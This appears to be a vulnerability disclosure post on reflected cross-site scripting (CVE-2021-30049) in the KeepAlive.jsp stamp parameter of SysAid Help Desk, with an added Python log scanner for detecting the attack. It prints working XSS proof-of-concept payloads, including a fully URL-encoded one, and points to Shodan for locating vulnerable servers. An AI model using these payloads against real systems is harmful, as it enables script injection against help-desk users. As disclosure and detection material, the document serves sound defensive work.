SysAID

SysAid Technologies (formerly Ilient) is an international company founded in 2002 that develops and provides IT Service Management software. SysAid Technologies is a privately owned company, founded by Israel Lifshitz (also founder of NUBO Software).

SysAid Help Desk System v20.3.64 b14.

Every so often the application checks whether the session is still valid through the KeepAlive.jsp script; this was observed through the proxy with Burp Suite.

With an external tool I verified the possibility of accessing the same file from another location.

KeepAlive.jsp uses the GET method to send the stamp, tabID and lastClick parameters to verify the validity of the session.

The service returns a Boolean response along with the content of the stamp parameter.

If the stamp parameter is modified, it can be verified that this value is reflected in the response.

The existence of reflected cross-site scripting was validated using the following payloads:

/KeepAlive.jsp?stamp=16170297<script>alert(String.fromCharCode(88,83,83,32,45,32,82,101,102,108,101,106,97,100,111))</script>83632

/KeepAlive.jsp?stamp=16170297"><svg onload=alert(1)>

URL-encoded payload (Burp Suite):

/KeepAlive.jsp?stamp=%31%36%31%37%30%32%39%37%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%38%38%2c%38%33%2c%38%33%2c%33%32%2c%34%35%2c%33%32%2c%38%32%2c%31%30%31%2c%31%30%32%2c%31%30%38%2c%31%30%31%2c%31%30%36%2c%39%37%2c%31%30%30%2c%31%31%31%29%29%3c%2f%73%63%72%69%70%74%3e%38%33%36%33%32

The vulnerability is confirmed from the browser.
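For defenders reviewing web server logs for this issue, the following added example (not part of the original write-up and not SysAid code) flags KeepAlive.jsp requests whose stamp value is not purely numeric. It percent-decodes the value first, because a fully URL-encoded request like the one above contains no literal markup characters in the log. The combined log format, the digits-only rule for stamp and the sample lines are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# Assumption: a legitimate stamp is digits only, like the value shown above.
STAMP_OK = re.compile(r"\d{1,32}")
# Characters that let a reflected value break out into markup.
MARKUP_CHARS = set("<>\"'&")

# Constructed sample log lines (not taken from the original page).
SAMPLE_LOG = [
    '198.51.100.4 - - [01/Apr/2021:10:00:00 +0000] "GET /KeepAlive.jsp?stamp=1617029783632&tabID=1&lastClick=0 HTTP/1.1" 200 20',
    '198.51.100.9 - - [01/Apr/2021:10:00:05 +0000] "GET /KeepAlive.jsp?stamp=16170297%3Cb%3Ex%3C%2Fb%3E HTTP/1.1" 200 40',
    '203.0.113.7 - - [01/Apr/2021:10:00:09 +0000] "GET /KeepAlive.jsp?stamp=%31%36%3c%62%3e HTTP/1.1" 200 24',
    '198.51.100.4 - - [01/Apr/2021:10:00:12 +0000] "GET /Login.jsp?stamp=abc HTTP/1.1" 200 512',
]


def check_line(line):
    """Return None for irrelevant or clean lines, else a finding dict."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/keepalive.jsp"):
        return None
    # parse_qs percent-decodes, so fully encoded values are normalised first.
    for value in parse_qs(url.query, keep_blank_values=True).get("stamp", []):
        if STAMP_OK.fullmatch(value):
            continue
        return {
            "client": line.split(" ", 1)[0],
            "stamp": value,
            "markup": sorted(MARKUP_CHARS & set(value)),
        }
    return None


def scan(lines):
    """Collect findings for every suspicious KeepAlive.jsp request."""
    return [f for f in map(check_line, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same digits-only check, applied server-side before the value is written into the response, is the corresponding input-validation control; HTML-encoding the reflected value covers the output side.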

The vulnerable version in the Shodan search engine.

https://www.sysaid.com

CVE ID: CVE-2021-30049

#HappyHacking